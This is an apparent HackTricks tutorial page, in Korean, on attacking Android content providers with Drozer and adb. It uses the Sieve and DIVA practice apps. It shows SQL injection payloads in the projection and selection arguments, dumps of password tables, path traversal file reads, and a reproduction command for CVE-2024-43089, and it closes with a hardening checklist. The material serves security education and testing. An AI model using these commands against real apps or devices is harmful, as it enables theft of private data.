HackTricksExploiting Content Providers
Reading time: 7 minutes
tip
AWS 해킹 배우기 및 연습하기:
HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: 
HackTricks Training GCP Red Team Expert (GRTE)
Azure 해킹 배우기 및 연습하기: 
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks 지원하기
- 구독 계획 확인하기!
- **💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.
- HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.
Intro
데이터는 content provider로 알려진 구성 요소에 의해 요청 시 하나의 애플리케이션에서 다른 애플리케이션으로 공급됩니다. 이러한 요청은 ContentResolver class 메서드를 통해 관리됩니다. Content provider는 데이터베이스, 파일 또는 네트워크와 같은 다양한 위치에 데이터를 저장할 수 있습니다.
Manifest.xml 파일에서는 content provider의 선언이 필요합니다. 예를 들어:
<provider android:name=".DBContentProvider" android:exported="true" android:multiprocess="true" android:authorities="com.mwr.example.sieve.DBContentProvider">
<path-permission android:readPermission="com.mwr.example.sieve.READ_KEYS" android:writePermission="com.mwr.example.sieve.WRITE_KEYS" android:path="/Keys"/>
</provider>
content://com.mwr.example.sieve.DBContentProvider/Keys에 접근하려면 READ_KEYS 권한이 필요합니다. 흥미롭게도, /Keys/ 경로는 개발자가 /Keys를 보호했지만 /Keys/를 선언하는 실수로 인해 보호되지 않는 다음 섹션에서 접근할 수 있습니다.
아마도 개인 데이터에 접근하거나 일부 취약점(SQL Injection 또는 Path Traversal)을 악용할 수 있습니다.
노출된 콘텐츠 제공자에서 정보 가져오기
dz> run app.provider.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
Authority: com.mwr.example.sieve.DBContentProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.DBContentProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
Path Permissions:
Path: /Keys
Type: PATTERN_LITERAL
Read Permission: com.mwr.example.sieve.READ_KEYS
Write Permission: com.mwr.example.sieve.WRITE_KEYS
Authority: com.mwr.example.sieve.FileBackupProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.FileBackupProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
DBContentProvider에 도달하는 방법을 "content://"로 시작하는 URI를 통해 조합할 수 있습니다. 이 접근 방식은 Drozer를 사용하여 얻은 통찰력에 기반하며, 주요 정보는 /Keys 디렉토리에 위치해 있었습니다.
Drozer는 여러 URI를 추측하고 시도할 수 있습니다:
dz> run scanner.provider.finduris -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/
...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/Keys
Accessible content URIs:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
당신은 ContentProvider 코드를 확인하여 쿼리를 검색해야 합니다:
%20(1)%20(1)%20(1).png)
또한, 전체 쿼리를 찾을 수 없다면 onCreate 메서드에서 ContentProvider에 의해 선언된 이름을 확인할 수 있습니다:
.png)
쿼리는 다음과 같을 것입니다: content://name.of.package.class/declared_name
데이터베이스 기반 Content Providers
대부분의 Content Providers는 데이터베이스의 인터페이스로 사용됩니다. 따라서, 접근할 수 있다면 정보를 추출, 업데이트, 삽입 및 삭제할 수 있을 것입니다.
민감한 정보에 접근할 수 있는지 확인하거나 권한 우회 메커니즘을 변경해 보십시오.
Content Provider의 코드를 확인할 때 **query, insert, update 및 delete**와 같은 이름의 함수도 확인하십시오:
.png)
%20(1)%20(1)%20(1)%20(1)%20(1)%20(1)%20(1).png)
이들을 호출할 수 있기 때문입니다.
쿼리 내용
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
_id: 1
service: Email
username: incognitoguy50
password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w==
-
email: incognitoguy50@gmail.com
Insert content
데이터베이스를 쿼리하면 열의 이름을 알 수 있으며, 그 후 DB에 데이터를 삽입할 수 있습니다:
.png)
.png)
삽입 및 업데이트 시 --string을 사용하여 문자열을 나타내고, --double로 더블을 나타내며, --float, --integer, --long, --short, --boolean을 사용할 수 있습니다.
Update content
열의 이름을 알면 항목을 수정할 수 있습니다:
.png)
Delete content
.png)
SQL Injection
**(SQLite)**에 대한 SQL 인젝션을 테스트하는 것은 프로젝션 및 선택 필드를 조작하여 간단합니다.
Content Provider를 쿼리할 때 정보를 검색하기 위한 2개의 흥미로운 인수가 있습니다: --selection 및 --projection:
.png)
이 매개변수를 악용하여 SQL 인젝션을 테스트할 수 있습니다:
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "*
FROM SQLITE_MASTER WHERE type='table';--"
| type | name | tbl_name | rootpage | sql |
| table | android_metadata | android_metadata | 3 | CREATE TABLE ... |
| table | Passwords | Passwords | 4 | CREATE TABLE ... |
Drozer에 의한 자동 SQLInjection 발견
dz> run scanner.provider.injection -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Injection in Projection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
Injection in Selection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
dz> run scanner.provider.sqltables -a jakhar.aseem.diva
Scanning jakhar.aseem.diva...
Accessible tables for uri content://jakhar.aseem.diva.provider.notesprovider/notes/:
android_metadata
notes
sqlite_sequence
파일 시스템 기반 콘텐츠 제공자
콘텐츠 제공자는 파일에 접근하는 데 사용될 수 있습니다:
.png)
파일 읽기
콘텐츠 제공자에서 파일을 읽을 수 있습니다.
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1 localhost
경로 탐색
파일에 접근할 수 있다면, 경로 탐색을 악용해 볼 수 있습니다(이 경우에는 필요하지 않지만 "../"와 유사한 트릭을 사용해 볼 수 있습니다).
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1 localhost
Drozer에 의한 자동 경로 탐색 발견
dz> run scanner.provider.traversal -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Vulnerable Providers:
content://com.mwr.example.sieve.FileBackupProvider/
content://com.mwr.example.sieve.FileBackupProvider
2023-2025 업데이트 및 최신 팁
Drozer 3.x (Python 3) 출시
WithSecure는 2022년에 drozer의 유지 관리를 재개하고 프레임워크를 Python 3(최신 3.1.0 – 2024년 4월)로 포팅했습니다. 호환성 수정 외에도 Content Providers 작업 시 특히 유용한 새로운 모듈이 포함되어 있습니다:
scanner.provider.exported–android:exported="true"인 제공자만 나열합니다.app.provider.grant–grantUriPermission()을 자동으로 호출하여 Android 12+에서FLAG_GRANT_READ_URI_PERMISSION/FLAG_GRANT_WRITE_URI_PERMISSION을 기대하는 제공자와 통신할 수 있습니다.- Scoped Storage의 더 나은 처리로 Android 11+에서 파일 기반 제공자에 여전히 접근할 수 있습니다.
업그레이드(호스트 및 에이전트):
pipx install --force "git+https://github.com/WithSecureLabs/drozer@v3.1.0"
adb install drozer-agent-3.1.0.apk
내장된 cmd content 헬퍼 사용 (ADB ≥ 8.0)
모든 최신 Android 기기는 에이전트를 설치하지 않고 프로바이더를 쿼리/업데이트할 수 있는 CLI를 제공합니다:
adb shell cmd content query --uri content://com.test.provider/items/
adb shell cmd content update --uri content://com.test.provider/items/1 \
--bind price:d:1337
adb shell cmd content call --uri content://com.test.provider \
--method evilMethod --arg 'foo'
run-as <pkg> 또는 루팅된 셸과 결합하여 내부 전용 제공자를 테스트합니다.
Content Providers를 악용한 최근 실제 CVE
| CVE | 연도 | 구성 요소 | 버그 클래스 | 영향 |
|---|---|---|---|---|
| CVE-2024-43089 | 2024 | MediaProvider | openFile()에서의 경로 탐색 | 모든 앱의 개인 저장소에서 임의 파일 읽기 |
| CVE-2023-35670 | 2023 | MediaProvider | 경로 탐색 | 정보 유출 |
취약한 빌드에서 CVE-2024-43089 재현:
adb shell cmd content read \
--uri content://media/external_primary/file/../../data/data/com.target/shared_prefs/foo.xml
API 30+에 대한 보안 강화 체크리스트
- 제공자가 공개되어야 하는 경우가 아니라면
android:exported="false"를 선언하십시오. API 31부터 이 속성은 필수입니다. - 전체 제공자를 내보내는 대신 권한을 강제 적용하거나
android:grantUriPermissions="true"를 사용하십시오. - 허용된
projection,selection및sortOrder인수를 화이트리스트에 추가하십시오 (예:SQLiteQueryBuilder.setProjectionMap으로 쿼리 빌드). openFile()에서 요청된 경로를 정규화하고 (FileUtils)..시퀀스를 거부하여 탐색을 방지하십시오.- 파일을 노출할 때는 Storage Access Framework 또는
FileProvider를 선호하십시오.
최근 Android 버전의 이러한 변경 사항은 많은 레거시 익스플로잇 원시 기능이 여전히 작동하지만, 업데이트된 drozer 모듈이나 cmd content 도우미가 자동으로 적용할 수 있는 추가 플래그/권한이 필요함을 의미합니다.
참조
- https://www.tutorialspoint.com/android/android_content_providers.htm
- https://manifestsecurity.com/android-application-security-part-15/
- https://labs.withsecure.com/content/dam/labs/docs/mwri-drozer-user-guide-2015-03-23.pdf
- https://github.com/WithSecureLabs/drozer/releases/tag/3.1.0
- https://source.android.com/security/bulletin/2024-07-01
tip
AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)
Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks 지원하기
- 구독 계획 확인하기!
- **💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.
- HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.